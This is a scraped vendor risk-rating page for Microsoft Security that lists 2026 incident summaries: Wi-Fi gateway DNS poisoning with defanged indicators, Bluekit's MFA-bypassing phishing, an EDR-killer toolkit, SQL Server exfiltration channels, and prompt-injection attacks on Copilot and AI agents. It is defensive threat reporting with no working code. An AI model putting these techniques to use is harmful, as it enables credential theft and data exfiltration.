Rankiteo Logo
Rankiteo
Leader in Cyber Underwriting
Loading...
NEWRankiteo Cyber Underwriting Desktop - Score, price, and bind from your desktop
WindowsmacOSLinux
Download
Microsoft Security

Microsoft Security Vendor Cyber Rating & Cyber Score

microsoft.com

Leading source for security innovation, industry insights, and news. Stay ahead of every shift in the security landscape and discover tools to help you secure your organization.​


Microsoft Security A.I CyberSecurity Scoring

Microsoft Security
Company Information
Website:https://www.microsoft.com/security
Employees number:None
Number of followers:579,191
NAICS:541514
Industry Type:Computer and Network Security
Homepage:microsoft.com
Microsoft Security Risk Score (AI oriented)
Between 0 and 549
logo
Microsoft SecurityComputer and Network Security
Updated:
24/07/2026
100/1000
Critical
C
AaaAaABaaBaBCaaCaC
Powered by our proprietary A.I cyber incident model
Insurance prefers TPRM score to calculate premium
Microsoft Security Global Score (TPRM)
xxxx
logo
Microsoft SecurityComputer and Network Security
•••
Score locked
Instant access to detailed risk factors
Vulnerabilities
Benchmark vs. industry & size peers
Findings

Microsoft Security
Microsoft SecurityCritical
Current Score
100C (CRITICAL)
01000
64 incidents
-20.1 avg impact
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
AUGUST 2026
100Before Incident
JULY 2026
100Before Incident
Cyber Attack
24 Jul 2026Microsoft Security
Microsoft: Hackers Hijack Hotel Wi-Fi Gateways to Steal Microsoft 365 Accounts Without Phishing

Hotel Wi-Fi Gateways Hijacked to Steal Microsoft 365 Accounts in Global Campaign

100After Incident
CRITICAL0
MIC1784881741
Hotel Wi-Fi Gateways Hijacked to Steal Microsoft 365 Accounts in Global Campaign Threat actors are targeting hotel and conference-center Wi-Fi gateways to compromise Microsoft 365 accounts from traveling employees, bypassing traditional phishing or endpoint infections. The campaign, active since at least June 2026, exploits DNS poisoning and, in some cases, Microsoft’s device-code flow to redirect users to attacker-controlled infrastructure. The attacks have been observed in shared Wi-Fi environments across multiple U.S. cities, India, and Saudi Arabia, impacting organizations in financial services, legal, healthcare, energy, retail, and professional services. Rather than focusing on a single industry, the campaign appears to target travelers using vulnerable captive-portal appliances common in hotels, conference centers, airports, and coworking spaces. Once attackers gain administrative access to these gateways likely through exposed management services or weak credentials they alter DNS settings to redirect users attempting to log into Microsoft 365. By poisoning DNS responses, the attackers substitute legitimate Microsoft sign-in domains with spoofed pages hosted on malicious infrastructure. Domains linked to the operation include m365-owa[.]com, owa-ms365[.]com, ms365-device[.]com, and ms365-live[.]com, associated with IP addresses 31.57.243[.]154, 104.194.159[.]150, and the DNS-poisoning response address 38.146.28[.]75. The attack is particularly stealthy, as it requires no phishing emails, malicious attachments, or endpoint exploits. A single compromised gateway can expose all connected devices that accept its DHCP configuration. While the tactics resemble those of APT28 (also known as Fancy Bear or Forest Blizzard) including adversary-in-the-middle techniques and credential theft there is no direct technical evidence attributing this campaign to the group. In some cases, attackers also attempted to abuse the Web Proxy Auto-Discovery Protocol (WPAD) on Windows and macOS systems, directing devices to malicious proxy auto-configuration files to intercept application traffic. The incident underscores the risks of unsecured public Wi-Fi networks and the need for robust network-level defenses.
INCIDENT DETAILS -
TYPE
Credential Theft
MOTIVATION
Credential theft for unauthorized access
IMPACT
Data Compromised: Microsoft 365 account credentialsWi-Fi gatewaysConnected devices accepting DHCP configurationsOperational Impact: Unauthorized access to corporate accounts and dataBrand Reputation Impact: Potential reputational damage due to compromised accountsIdentity Theft Risk: High (PII and corporate data exposure)
DATA BREACH
Type Of Data Compromised: Microsoft 365 account credentialsSensitivity Of Data: High (corporate emails, documents, PII)Personally Identifiable Information: Potential (depends on account contents)
JULY 2026
100Before Incident
Vulnerability
22 Jul 2026Microsoft Security
Microsoft: Public PoC Released for Windows NT OS Kernel Privilege Escalation Vulnerability

Public PoC Exploit Released for High-Severity Windows NT Kernel Privilege Escalation Flaw (CVE-2026-42980)

100After Incident
CRITICAL0
MIC1784744777
Public PoC Exploit Released for High-Severity Windows NT Kernel Privilege Escalation Flaw (CVE-2026-42980) A proof-of-concept (PoC) exploit for CVE-2026-42980, a high-severity local privilege escalation vulnerability in the Windows NT OS Kernel, has been publicly released. The flaw stems from an integer underflow in kernel-mode code, allowing a locally authenticated attacker with low privileges to execute arbitrary code with SYSTEM-level access. The vulnerability enables attackers to escalate privileges from a standard user account to NT AUTHORITY\SYSTEM, granting full control over affected Windows systems. Exploitation requires no user interaction, making it a prime target for post-compromise attacks, including lateral movement and disabling security controls. Security researcher G4sp4rCS published the PoC on GitHub, including source code, build scripts, and a technical writeup. The exploit targets a vulnerable WMI-related kernel path and is designed for educational and defensive research in isolated environments. Microsoft has released a patch as part of its regular security updates, urging administrators to apply fixes immediately. With public exploit code now available, the risk of weaponization has increased, particularly in scenarios where attackers gain initial access via phishing, malware, or browser exploits. Organizations are advised to prioritize patching, especially on multi-user and terminal servers, and restrict local logon rights to mitigate exposure. Monitoring for suspicious privilege escalation attempts is also recommended.
INCIDENT DETAILS -
TYPE
Privilege Escalation
IMPACT
Systems Affected: Windows systems with vulnerable NT KernelOperational Impact: Full system compromise, lateral movement, disabling security controls
JULY 2026
100Before Incident
Cyber Attack
21 Jul 2026Microsoft Security
Microsoft: Watch out - that Microsoft Calendar invite dated 2050 could be hiding stolen files and worse

HollowGraph Malware Abuses Microsoft Graph API to Target Israeli Entities

100After Incident
CRITICAL0
MIC1784658331
HollowGraph Malware Abuses Microsoft Graph API to Target Israeli Entities Security researchers at Group-IB have uncovered a novel malware strain, HollowGraph, designed to exfiltrate sensitive files from compromised systems by leveraging Microsoft Graph API and hijacked Microsoft 365 calendars. The malware stands out for its stealthy command-and-control (C2) mechanism, which evades detection by embedding instructions in future-dated calendar entries (set for 2050) within a victim’s Microsoft 365 account. After executing commands and harvesting data, HollowGraph encrypts and attaches stolen files to calendar events, blending malicious traffic with legitimate Microsoft Graph activity. Key Details: - Targets: At least 12 Israeli entities, with three systems still actively communicating with attacker infrastructure during Group-IB’s investigation. - Infection Vector: Compromised Microsoft 365 accounts, granting access to Microsoft Graph API. - Exfiltration Method: Encrypted data is sent via calendar event attachments, appearing as routine traffic. - Attribution: While Group-IB noted technical overlaps with Lyceum (an Iranian-linked threat group tied to OilRig), the connection remains low-confidence due to insufficient distinct evidence. The malware’s framework, Cavern, shares similarities with a .NET backdoor previously used by Lyceum, including command structures and plugin mechanisms. However, researchers emphasize that these parallels do not confirm attribution. HollowGraph’s abuse of trusted cloud services highlights an evolving tactic to bypass traditional security monitoring, posing challenges for defenders relying on network traffic analysis.
INCIDENT DETAILS -
TYPE
Malware
IMPACT
Data Compromised: Sensitive files
DATA BREACH
Type Of Data Compromised: Sensitive filesSensitivity Of Data: High
JULY 2026
100Before Incident
Vulnerability
15 Jul 2026Microsoft Security
SonicWall, Oracle, Microsoft, KNX Association, AsyncAPI and Cisco: Ernst & Young (EY) - Security Affairs

Cybersecurity Roundup: Critical Vulnerabilities, Supply Chain Attacks, and Major Breaches

100After Incident
CRITICAL0
CISSONMICORAASYKNX1784341544
Cybersecurity Roundup: Critical Vulnerabilities, Supply Chain Attacks, and Major Breaches The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has expanded its Known Exploited Vulnerabilities (KEV) catalog with new entries, including a KNX Association protocol flaw (Connection Authorization Option 1) and multiple Oracle, SonicWall, Microsoft, and Cisco IOS vulnerabilities. These additions highlight active exploitation risks, urging organizations to prioritize patching. In a supply chain attack, malicious actors injected malware into AsyncAPI npm packages, which collectively see 2 million weekly downloads. The compromised packages could expose developers to data theft or further compromise. Lidl disclosed a data breach affecting online shop customers in Germany, Belgium, and the Netherlands, though details on the scope and impact remain limited. Microsoft’s July 2026 Patch Tuesday set a record with 621 CVEs addressed, marking the largest security update in its history. The fixes span critical vulnerabilities across Windows, Office, and other enterprise products. The U.S. Treasury sanctioned a VPN provider and cryptor seller linked to billions in ransomware losses, targeting infrastructure used by cybercriminals to evade detection and launder payments. Japan faced multiple cyber incidents, including a malware attack on Nihon Kotsu, the country’s largest taxi operator, which temporarily suspended services. Additionally, Nichirei, a major food company, confirmed a cyberattack, though operational disruptions were not disclosed. Ernst & Young (EY) is investigating a data breach involving third-party support tickets, raising concerns over unauthorized access to sensitive client information. Two members of the Scattered Spider hacking group were sentenced for their role in a £29 million cyberattack on Transport for London (TfL), underscoring the group’s financial motivations and persistent threat to critical infrastructure. A new Russian cyber campaign was uncovered, distributing fake Webex and Zoom installers to deploy Starland RAT, a remote access trojan used for espionage and data exfiltration. Security researchers identified CrashStealer, a macOS infostealer leveraging signed apps to bypass Gatekeeper protections, and TuxBot v3, an AI-powered IoT botnet with documented flaws but potential for large-scale attacks. The EU imposed sanctions on FSB-linked hackers for cyber sabotage, targeting state-backed actors behind disruptive campaigns. A Chinese cyber espionage group was found using Claude and DeepSeek AI models to enhance malware development, including a custom PowerShell reconnaissance tool. SonicWall warned of active exploitation of two SMA 1000 zero-day vulnerabilities, while Zoom patched CVE-2026-53412, a critical account takeover flaw that could allow unauthorized access to user sessions.
INCIDENT DETAILS -
TYPE
Vulnerability ExploitationSupply Chain AttackData BreachRansomwareMalware AttackCyber Espionage
MOTIVATION
Financial GainEspionageData TheftSabotage
IMPACT
Financial Loss: £29 million (Scattered Spider attack on TfL)Customer data (Lidl)Sensitive client information (EY)Personally identifiable information (various breaches)Nihon Kotsu taxi servicesNichirei food company systemsTransport for London (TfL)Downtime: Temporary suspension of Nihon Kotsu servicesService disruptions (Nihon Kotsu)Unauthorized access (EY)LidlEYNihon KotsuNichireiLidl customersEY clients
DATA BREACH
Customer dataSensitive client informationPersonally identifiable informationHigh (PII, client data)Lidl customer dataEY client data
Vulnerability
15 Jul 2026Microsoft Security
Microsoft: New LegacyHive Windows 0-day Vulnerability Allows Users to Load Another User’s Registry

LegacyHive PoC Exploit Exposes Windows Privilege Escalation Vulnerability

100After Incident
CRITICAL0
MIC1784096635
LegacyHive PoC Exploit Exposes Windows Privilege Escalation Vulnerability A new proof-of-concept (PoC) exploit, LegacyHive, has been released, targeting a Windows elevation-of-privilege vulnerability in the User Profile Service. The exploit allows a standard user to load another user’s registry hive under their own registry classes root, potentially enabling unauthorized access or privilege escalation. Registry hives store critical configuration data for Windows, applications, and user profiles. If improperly accessed, they can expose sensitive settings that affect software execution, COM object resolution, and file handling. The LegacyHive PoC, published by security researcher Nightmare-Eclipse, claims compatibility with all supported Windows desktop and server versions that have received the July 2026 security updates. The publicly released version of the exploit is intentionally restricted to mitigate immediate abuse, requiring credentials for a second standard user and the username of a third account potentially an administrator. However, the original technique did not impose these limitations and could load arbitrary hives, including UsrClass.dat, which contains file associations, shell settings, and COM configurations. If successfully executed, the exploit mounts the target account’s user hive within the attacker’s registry context. This could allow threat actors to identify additional privilege escalation paths based on local system configurations and accessible registry data. Despite its severity, the vulnerability currently lacks a CVE identifier, Microsoft advisory, or official patch. The disclosure suggests that routine monthly updates may not fully address the issue, as the PoC remains functional on systems patched as recently as July 2026. Security teams are advised to restrict local access to trusted users, monitor for unusual profile-loading activity, and review endpoint telemetry for unauthorized access to registry files like NTUSER.DAT and UsrClass.dat. The release underscores the persistent risks of local Windows privilege-escalation flaws, particularly those affecting core services responsible for managing user profile data.
INCIDENT DETAILS -
TYPE
Privilege Escalation
MOTIVATION
Proof-of-Concept Demonstration
IMPACT
Systems Affected: All supported Windows desktop and server versions (as of July 2026 updates)Operational Impact: Potential unauthorized access, privilege escalation, and exposure of sensitive registry data
DATA BREACH
Type Of Data Compromised: Registry hive data (file associations, shell settings, COM configurations, user profile settings)Sensitivity Of Data: High (contains critical system and user configuration data)NTUSER.DATUsrClass.dat
JULY 2026
100Before Incident
Vulnerability
14 Jul 2026Microsoft Security
Microsoft: Microsoft Active Directory Services 0-Day Vulnerability Actively Exploited in the Wild

Microsoft Patches Actively Exploited AD FS Privilege Escalation Flaw (CVE-2026-56155)

100After Incident
CRITICAL0
MIC1784096831
Microsoft Patches Actively Exploited AD FS Privilege Escalation Flaw (CVE-2026-56155) Microsoft has released security updates for CVE-2026-56155, an actively exploited elevation-of-privilege vulnerability in Active Directory Federation Services (AD FS). The flaw allows authenticated local attackers with low privileges to gain administrator-level access on affected systems. The vulnerability stems from insufficient granularity in AD FS access controls, enabling attackers to bypass authorization restrictions. With a CVSS 3.1 score of 7.8, the flaw is rated Important and has been confirmed as exploited in the wild. Exploitation requires low complexity, no user interaction, and only local access, though successful attacks can fully compromise system confidentiality, integrity, and availability. AD FS servers are high-value targets due to their role in single sign-on (SSO) and federated authentication, processing authentication requests and issuing security tokens for corporate services. A compromised AD FS server could allow attackers to alter federation settings, access sensitive authentication materials, disable security controls, or pivot to other network systems. The issue is classified under CWE-1220 (Insufficient Granularity of Access Control), where software fails to enforce proper authorization checks. Microsoft addressed the flaw in its July 14, 2026, security updates, covering Windows Server 2012 through 2025, including Server Core deployments, as well as affected Windows 10 versions. Organizations using AD FS are advised to prioritize patching, particularly on federation servers linked to critical identity infrastructure. Security teams should verify patch installation, monitor for unusual activity (e.g., unexpected process executions or federation configuration changes), and review local administrator group modifications. Microsoft credited Jeremy Kingston and Scott Clark of its Detection and Response Team (DART) for reporting the vulnerability. Technical details of the exploit remain undisclosed, providing defenders additional time to mitigate risks while attacks persist.
INCIDENT DETAILS -
TYPE
Privilege Escalation
IMPACT
Systems Affected: AD FS servers, Windows Server 2012 through 2025, Windows 10 versionsOperational Impact: Full compromise of system confidentiality, integrity, and availability; potential pivot to other network systemsIdentity Theft Risk: High (due to access to sensitive authentication materials)
DATA BREACH
Type Of Data Compromised: Authentication materials, federation settingsSensitivity Of Data: High
Vulnerability
14 Jul 2026Microsoft Security
Microsoft: Microsoft’s Secure Boot has been broken for a decade and no one noticed until now

Microsoft’s Secure Boot Flaw Exposed: 13-Year-Old Shim Vulnerabilities Bypass Critical Protection

100After Incident
CRITICAL0
MIC1784141218
Microsoft’s Secure Boot Flaw Exposed: 13-Year-Old Shim Vulnerabilities Bypass Critical Protection Researchers at ESET have uncovered a critical oversight in Microsoft’s Secure Boot implementation, revealing that a key protection mechanism has been trivially bypassable for nearly its entire existence. The flaw stems from 11 defective firmware "shims" signed by Microsoft between 2013 and the present that were never revoked despite known vulnerabilities. Secure Boot, introduced in 2012, was designed to prevent bootkit infections by ensuring only trusted, digitally signed firmware loads during startup. However, ESET found that attackers can exploit these outdated, yet still-trusted, shims to completely disable the protection. The technique requires no advanced exploitation skills only access to one of the unrevoked shims and basic knowledge of UEFI mechanics. The impact spans both Windows and Linux systems, as compromised shims can be installed on either OS. Once deployed, attackers can install malicious firmware that persists even after OS reinstalls or hard drive replacements, mirroring the tactics of high-profile bootkits like Russia’s LoJax (2018), China-linked MosaicRegressor (2020), and the recent BlackLotus (2023). Microsoft’s failure to revoke the vulnerable shims despite their public availability has left devices exposed to a low-effort but high-impact attack vector, undermining a foundational security measure for over a decade.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Systems Affected: Windows and Linux systems with Secure Boot enabledOperational Impact: Persistent malware installation bypassing Secure BootBrand Reputation Impact: Undermining foundational security measure
JUNE 2026
100Before Incident
Cyber Attack
26 Jun 2026Microsoft Security
Microsoft: New Bluekit Phishing-as-a-Service Bypasses MFA to Steal Microsoft Login Credentials

Bluekit Phishing-as-a-Service Platform Bypasses MFA with Browser-in-the-Middle Technique

100After Incident
CRITICAL0
MIC1782483842
Bluekit Phishing-as-a-Service Platform Bypasses MFA with Browser-in-the-Middle Technique Cybersecurity firm Netcraft has identified a fully operational Phishing-as-a-Service (PhaaS) platform called Bluekit, which has rapidly scaled its operations, with approximately 70 live hostnames detected in a single week. Originally documented by Varonis Threat Labs as an emerging tool, Bluekit has evolved into a sophisticated threat capable of bypassing multi-factor authentication (MFA) and harvesting Microsoft login credentials in real time. Unlike traditional adversary-in-the-middle (AitM) tools like Evilginx, which intercept traffic between victims and legitimate sites, Bluekit employs a Browser-in-the-Middle (BitM) technique. The platform loads the real Microsoft login page inside an attacker-controlled browser and streams it to victims using rrweb, an open-source JavaScript library for session replay. Victims interact with the authentic login page, but their actions execute in the attacker’s browser, granting threat actors a fully authenticated session. ### Attack Architecture & Evasion Tactics Bluekit operates in two phases before capturing credentials: 1. Victim Qualification – Before displaying phishing content, the platform conducts layered anti-analysis checks, including: - Randomized CSS filters to defeat pixel-hash detection. - Custom CAPTCHAs impersonating brands like Cloudflare. - Obfuscated JavaScript bundles (exceeding 1MB) that rotate periodically. - Browser fingerprinting (RAM, CPU, screen resolution, headless browser detection). - WebRTC-based IP mismatch detection to identify security analysts. 2. BitM Delivery – Qualified victims receive a live DOM stream of the Microsoft login page via WebSocket, rendering a pixel-perfect, interactive interface. Keystrokes and mouse movements are relayed to the attacker’s browser, which executes them against the real Microsoft site. The attacker’s administration panel provides real-time visibility into victim sessions, including post-authentication activity. ### Why Bluekit Evades Detection A key advantage over tools like Evilginx is session consistency the stolen session is created and used in the same browser, eliminating fingerprint mismatches that detection systems might flag. Traditional MFA (SMS, authenticator apps, push approvals) offers no protection, as victims complete the entire login flow including MFA verification inside the attacker’s browser. ### Detection & Defense Considerations Security teams should monitor for: - WebSocket connections transmitting encrypted/binary data on login pages. - Proxy API endpoints handling asset fetching instead of direct requests. - rrweb library presence outside known analytics contexts. - Custom CAPTCHAs with randomized HTML structures. - Large, obfuscated JavaScript bundles (over 1MB) with periodic rotation. - WebRTC IP mismatch detection on landing pages. Bluekit’s abuse of rrweb, a legitimate open-source tool, follows a growing trend of threat actors exploiting trusted developer infrastructure to bypass security controls. While rrweb’s presence alone is not an indicator of compromise, its use in this context underscores the need for session-level protections and behavioral detection in phishing defense strategies.
INCIDENT DETAILS -
TYPE
Phishing-as-a-Service (PhaaS)
IMPACT
Data Compromised: Microsoft login credentials, potentially post-authentication session dataSystems Affected: Microsoft login systems, victim browsersIdentity Theft Risk: High (credentials and session hijacking)
DATA BREACH
Type Of Data Compromised: Login credentials, session tokensSensitivity Of Data: High (Microsoft accounts, MFA-protected)Data Exfiltration: Real-time credential harvestingPersonally Identifiable Information: Potentially (if compromised accounts contain PII)
JUNE 2026
114Before Incident
Cyber Attack
25 Jun 2026Microsoft Security
Microsoft: Edge users beware — this malicious extension can break out of the sandbox and install ransomware

Malicious Edge Extension 'Edgecution' Exploits Teams Phishing to Deploy Backdoor

100After Incident
CRITICAL-14
MIC1782404840
Malicious Edge Extension "Edgecution" Exploits Teams Phishing to Deploy Backdoor Security researchers at Zscaler have identified a sophisticated cyberattack campaign dubbed "Edgecution", leveraging a malicious Microsoft Edge extension to establish a backdoor on targeted systems. The attack begins with Microsoft Teams phishing, where threat actors impersonate IT support, urging victims to install a fake "Outlook update" or "spam filter" via a fraudulent "Outlook Updates Management Console" website. Victims are tricked into downloading a ZIP archive containing a Python-based backdoor and an embedded Python runtime. Upon execution, the archive creates a scheduled task that launches Edge in headless mode (invisible to the user) and installs the malicious extension, officially named "Edge Monitoring Agent" but referred to by Zscaler as "Edgecution." The extension bypasses Edge’s sandbox by generating a Native Messaging manifest, enabling direct communication between the browser and the Python backdoor. This allows attackers to execute shell commands, PowerShell scripts, arbitrary Python code, write files, enumerate processes, and exfiltrate system data. Zscaler attributes the campaign to Initial Access Brokers (IABs) with suspected ties to the ransomware group Payout Kings, highlighting the growing sophistication of access-for-sale operations. The attack demonstrates an innovative evasion technique, combining browser extensions with native host execution to avoid traditional endpoint detection. Indicators of Compromise (IoCs) for the campaign have been published by Zscaler. The incident was first reported by BleepingComputer.
INCIDENT DETAILS -
TYPE
Phishing, Backdoor Deployment, Malicious Browser Extension
MOTIVATION
Initial Access for Sale, Potential Ransomware Deployment
IMPACT
Data Compromised: System data exfiltrationSystems Affected: Systems with Microsoft Edge and Python runtimeOperational Impact: Unauthorized remote access, potential data exfiltration
DATA BREACH
Type Of Data Compromised: System data, Process enumerationSensitivity Of Data: Potentially sensitive system and operational dataData Exfiltration: Yes
Vulnerability
25 Jun 2026Microsoft Security
Microsoft: Microsoft WinRE Vulnerability Allows Hackers to Bypass UEFI/BIOS Password Enforcement

Microsoft WinRE Vulnerability Exposes Systems to Firmware Bypass Attacks

100After Incident
CRITICAL-14
MIC1782375843
Microsoft WinRE Vulnerability Exposes Systems to Firmware Bypass Attacks A newly disclosed vulnerability in Microsoft’s Windows Recovery Environment (WinRE) allows attackers to bypass UEFI and BIOS password protections, granting unauthorized access to systems even with active firmware-level security controls. Tracked as CVE-2026-45585 and CERT/CC VU#226679, the flaw affects Windows 10 and Windows 11 systems utilizing WinRE for recovery and troubleshooting. WinRE, a built-in tool for system restoration and repair, includes features like the F11 recovery menu and "Reset this PC" option. However, researchers found that under certain firmware implementations, WinRE may trigger an alternate boot path that fails to enforce UEFI or BIOS authentication consistently. This inconsistency enables attackers with physical or administrative access to circumvent firmware protections, potentially altering boot settings or accessing sensitive data. The vulnerability is particularly concerning in "Evil Maid" attack scenarios, where an adversary gains temporary physical access to a device. By exploiting WinRE, attackers can bypass administrator-set BIOS or UEFI passwords, leveraging weaknesses in pre-boot authentication. The core issue stems from the UEFI BootNext variable, which allows systems to specify a one-time boot target in non-volatile memory (NVRAM). While intended for legitimate recovery operations, BootNext lacks cryptographic authentication and overrides standard BootOrder settings during the next boot cycle. This behavior can be abused to redirect systems into WinRE without triggering expected firmware-level checks. Though Secure Boot ensures only signed bootloaders execute, it does not fully mitigate the flaw, as it does not enforce consistent user authentication across all boot paths. Attackers may still access recovery environments, potentially weakening protections like BitLocker, especially if additional authentication (e.g., TPM + PIN) is not configured. Microsoft has acknowledged the issue and released guidance on hardening recovery environments and Secure Boot configurations. The vulnerability underscores the limitations of relying solely on firmware-level protections, highlighting the need for defense-in-depth strategies that address both physical and logical attack vectors.
INCIDENT DETAILS -
TYPE
Vulnerability Exploitation
IMPACT
Data Compromised: Sensitive data access possibleSystems Affected: Windows 10, Windows 11Operational Impact: Potential unauthorized system access and boot setting alterations
DATA BREACH
Sensitivity Of Data: Potentially sensitive system data
JUNE 2026
135Before Incident
Cyber Attack
22 Jun 2026Microsoft Security
iRhythm Technologies, Jamf, ShapedPlugin, Tanium, Fortinet, Microsoft and Texas Parks and Wildlife Department: 22nd June – Threat Intelligence Report

Cybersecurity Roundup: Major Breaches, AI Exploits, and Critical Vulnerabilities (Week of June 22)

113After Incident
CRITICAL-22
FORSHATANMICJAMIRHTEX1782147825
Cybersecurity Roundup: Major Breaches, AI Exploits, and Critical Vulnerabilities (Week of June 22) This week’s cybersecurity landscape saw significant breaches, supply chain attacks, and emerging AI-driven threats, alongside critical vulnerabilities under active exploitation. ### Major Breaches & Attacks - Texas Parks and Wildlife Department suffered a third-party breach via its license system vendor, exposing driver’s license details, passport numbers, emails, phone numbers, and addresses of 3.1 million hunting and fishing license customers. Social Security numbers and payment data remained unaffected. - ShapedPlugin, a WordPress plugin vendor, fell victim to a supply chain attack, delivering malicious updates for three paid plugins. The malware installed a hidden fake WooCommerce plugin to steal admin credentials, database access, and 2FA details, while modifying affected sites. The compromise stemmed from the vendor’s release infrastructure. - iRhythm Technologies, a U.S. digital health firm specializing in remote cardiac monitoring, confirmed a cyberattack where threat actors via a social engineering breach of third-party business applications stole protected health information, proprietary data, and personal records. Clinical systems were not impacted. - Klue, a market intelligence platform, disclosed a breach after attackers used compromised legacy integration credentials to steal OAuth tokens linked to customer Salesforce environments. The tokens enabled the theft of sales and customer data from clients, including Huntress, Recorded Future, Tanium, and Jamf. The Icarus extortion group claimed responsibility. ### AI-Driven Threats - Microsoft researchers uncovered AutoJack, an exploit chain where malicious web pages turn AI browsing agents into remote code execution vectors by abusing localhost trust, missing authentication, and unsafe parameter handling in AutoGen Studio’s MCP WebSocket interface. - SearchLeak, a prompt injection technique in Microsoft 365 Copilot Search, was revealed to exfiltrate data including emails, authentication codes, and OneDrive/SharePoint files via crafted links abusing Bing image fetches. Microsoft patched the flaw as CVE-2026-42824. - Researchers analyzed OpenClaw AI agent flaws, demonstrating how hidden contacts and phishing emails could trigger prompt injections, code execution, and data leaks, exposing local tools, secrets, and enterprise data through trusted external interactions. ### Critical Vulnerabilities & Exploits - Fortinet FortiSandbox vulnerabilities (CVE-2026-39813, CVE-2026-39808, CVE-2026-25089) are being exploited via unauthenticated API requests, enabling path traversal and root-level command execution, risking sandbox takeover and disruption of malware analysis and security workflows. - Microsoft confirmed CVE-2026-50656, a Defender zero-day allowing privilege escalation to SYSTEM via a race condition. A public proof-of-concept works on fully updated Windows 10 and 11, with a patch in development. - Cisco acknowledged active exploitation of CVE-2026-20262, an arbitrary file write flaw in Catalyst SD-WAN Manager. Authenticated attackers can overwrite system files and escalate to root, prompting patches for affected devices. - Splunk Enterprise’s CVE-2026-20253 is under active exploitation, allowing unauthenticated attackers to trigger file operations, potentially leading to remote code execution. Splunk confirmed limited attacks and released security updates. ### Threat Intelligence Highlights - A crypto clipboard hijacker, written in Rust and targeting Windows and macOS, was distributed via phishing sites and amplified on GitHub, SourceForge, YouTube, and legitimate news platforms. The malware swaps copied wallet addresses to redirect funds to attacker-controlled wallets.
INCIDENT DETAILS -
TYPE
Data BreachSupply Chain AttackCyberattackAI-Driven ThreatVulnerability Exploitation
MOTIVATION
Data TheftExtortionFinancial GainCredential HarvestingRemote Code Execution
IMPACT
Driver’s license detailsPassport numbersEmailsPhone numbersAddressesProtected health informationProprietary dataPersonal recordsSales dataCustomer dataOAuth tokensAdmin credentialsDatabase access2FA detailsWallet addressesLicense system vendorWordPress pluginsThird-party business applicationsSalesforce environmentsFortinet FortiSandboxMicrosoft DefenderCisco Catalyst SD-WAN ManagerSplunk EnterpriseDisruption of malware analysis and security workflowsSandbox takeoverPrivilege escalationFile operations leading to RCEYesYesNo
DATA BREACH
Driver’s license detailsPassport numbersEmailsPhone numbersAddressesProtected health informationProprietary dataPersonal recordsSales dataCustomer dataOAuth tokensAdmin credentialsDatabase access2FA detailsNumber Of Records Exposed: 3.1 millionHighYesYes
JUNE 2026
151Before Incident
Cyber Attack
21 Jun 2026Microsoft Security
CrowdStrike, SentinelOne, ESET, Microsoft and Kaspersky: Gentlemen Ransomware Builds Modular EDR Killer Suite From Rival Gang Tools

Gentlemen Ransomware Deploys Modular EDR-Killing Framework with Cross-Gang Tools

112After Incident
CRITICAL-39
MICSENKASESECRO1782073479
Gentlemen Ransomware Deploys Modular EDR-Killing Framework with Cross-Gang Tools The Gentlemen ransomware operation has adopted a sophisticated, modular approach to evading endpoint detection and response (EDR) systems, leveraging tools sourced from multiple criminal groups. According to an analysis by cybersecurity firm ESET, the gang’s arsenal includes GentleKiller a custom-built EDR killer with at least eight variants alongside borrowed tools like HexKiller, ThrottleBlood, and HavocKiller, previously used by other ransomware gangs. GentleKiller employs the bring your own vulnerable driver (BYOVD) technique, using eight distinct vulnerable drivers to gain kernel-level privileges. Its target list spans over 400 processes across 48 security vendors, including Microsoft, CrowdStrike, SentinelOne, and ESET itself. The tool impersonates legitimate software, such as Kaspersky and Valorant, and uses commercial packers like Enigma and Themida for obfuscation. The modular design allows affiliates to swap drivers without rewriting core code, complicating defenses static blocklists may catch one variant while leaving others operational. Beyond GentleKiller, the gang incorporates tools from rival groups, including HexKiller (linked to Warlock), ThrottleBlood (used by MesudaLocker and DragonForce), and HavocKiller (seen in multiple ransomware campaigns). This tool-sharing creates redundancy, attribution challenges, and tactical flexibility for affiliates. ESET also identified OxideHarvest, a Rust-based credential stealer likely developed externally. The gang’s targeting strategy includes exploiting FortiGate configurations, as seen in the compromise of Romanian energy provider Oltenia. A SystemBC proxy botnet, comprising over 1,570 corporate hosts, provides persistent access for EDR-killer-assisted attacks. The overlap between SystemBC detections and Gentlemen ransomware activity suggests energy-sector defenders should treat such infections as potential indicators of compromise. ESET’s findings highlight the gang’s operational persistence, with 478 victims documented before the modular framework was fully analyzed. The interchangeable nature of the tools combined with stolen digital signatures and rapid driver swaps makes detection and attribution increasingly difficult. Defenders are advised to audit driver blocklists against all eight GentleKiller variants, flag multi-gang EDR killer signatures in incidents, and harden FortiGate configurations to reduce exposure.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain (ransomware), data exfiltration
IMPACT
Data Compromised: Credentials (via OxideHarvest), potentially sensitive corporate dataSystems Affected: Endpoint detection and response (EDR) systems, corporate hosts (1,570+ via SystemBC botnet)Operational Impact: Disruption of security defenses, potential system encryptionIdentity Theft Risk: High (due to credential theft)
DATA BREACH
Type Of Data Compromised: Credentials, potentially sensitive corporate dataSensitivity Of Data: High (credentials, corporate data)Data Exfiltration: Yes (via OxideHarvest, potential ransomware exfiltration)Data Encryption: Yes (ransomware encryption)
JUNE 2026
153Before Incident
Vulnerability
18 Jun 2026Microsoft Security
Microsoft: Hackers Could Abuse SQL Server 2025 AI Features to Steal Sensitive Data

Microsoft SQL Server 2025’s AI Features Expose New Data Exfiltration Risks

150After Incident
CRITICAL-3
MIC1781785861
Microsoft SQL Server 2025’s AI Features Expose New Data Exfiltration Risks A recent security analysis by researcher Justin Kalnasy of SpecterOps reveals that Microsoft SQL Server 2025’s native AI capabilities can be weaponized by attackers to exfiltrate sensitive data and establish covert command-and-control (C2) channels directly within the database engine. The newly introduced AI-focused features designed to support workflows like Retrieval-Augmented Generation (RAG) include stored procedures and functions such as sp_invoke_external_rest_endpoint, CREATE EXTERNAL MODEL, and AI_GENERATE_EMBEDDINGS, all of which enable SQL Server to communicate with external services over HTTPS. The most critical vulnerability lies in sp_invoke_external_rest_endpoint, which allows database instances to send arbitrary HTTP requests to external endpoints with payloads up to 100MB. While intended for legitimate API integrations, this functionality provides attackers with a built-in data exfiltration channel. Once an adversary gains high-privileged access (e.g., sysadmin), they can extract entire tables or files and transmit them to attacker-controlled infrastructure without relying on traditional tools like PowerShell or xp_cmdshell, which are more likely to trigger security alerts. Attackers can serialize sensitive data into JSON format and exfiltrate it in bulk via HTTPS, avoiding bandwidth constraints typical of C2 frameworks. 